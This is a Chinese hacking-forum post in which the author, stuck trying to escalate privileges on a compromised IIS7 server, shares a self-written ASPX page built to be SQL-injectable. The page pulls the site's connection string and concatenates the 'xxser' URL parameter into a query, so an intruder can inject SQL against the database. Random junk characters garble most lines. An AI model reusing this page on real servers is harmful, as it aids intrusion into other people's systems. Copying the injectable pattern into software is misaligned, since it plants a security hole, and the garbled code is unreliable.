昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。7 I$ ^3 X2 I8 w1 H1 s% b
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。3 h# ~+ c3 Y, ~2 @
代码量不多,自己写个拉倒了。烦死了。
1 |4 d1 x: h; c) E# w& S4 e, x3 c8 y
+ a+ }8 J! o3 P5 A% E# U$ O, M8 T2 v9 b
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
6 y) }+ a1 Q: k" l<html xmlns="http://www.w3.org/1999/xhtml">+ w8 H! v/ ^6 I+ Z' z/ f1 S
<head runat="server">
% e& q( ^) N; Y8 I1 h Y- q! [! `( j# _ <title>暗影aspx构造注射专用页面</title>+ y6 A# N4 d" b/ n _! b& Y
</head>
3 N# h8 ~. D6 b! j' O<body>
A( l: n9 o3 ^' k* @) c& a5 \ <form id="form1" runat="server">6 P- @0 l$ S- a0 J
<div>% {- k! H+ J" \; E
<script language="c#" runat="server">3 K" i6 o" ~8 Q B# D4 j
. u; K, O) \& T3 L/ S7 `9 L void page_init(object sender, EventArgs e): Z2 [* O% D7 i" K! D1 w2 m
{1 s, m2 h, D, p d. r. k
: ~7 I+ S) o6 d( J8 W& |( h System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();3 D& M' N; L4 R4 U' E# b0 M4 Q
8 P* j5 \6 D. q/ m; g8 H: P
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();0 P) K2 R7 o; l- T
conn.Open();, u' r3 Q8 I" A& W2 o6 e/ I( p
" ^9 ?) H% L" M6 K" m3 Y& P
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
+ u- C8 u+ t3 h, K - t1 f9 G6 K" p4 e* `0 [
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);( K' H1 d4 G. y5 q" h( k
int x = command.ExecuteNonQuery();: R( P/ X: t2 X) R- p3 Y
Response.Write(i+"\n");- O w5 s2 j. }1 q* }
Response.Write(x);
3 {' O/ [. o# E0 ~0 @; ~2 i conn.Close();
3 z; U o2 j3 m6 b( ?) }( n+ H }6 Q3 S7 O; J' X) F: I
: h% f& m* ?7 e8 u
</script>+ @' L2 m: C7 e6 C& y \% c4 e
</div>
( R \3 \6 F* D4 j& b9 U9 r8 Y </form>
- b1 k K/ D) a! T1 g</body>* z) Z9 ^8 n9 u( y
</html>
5 n( E: F3 E& `, g5 l" u5 t0 l/ L- } |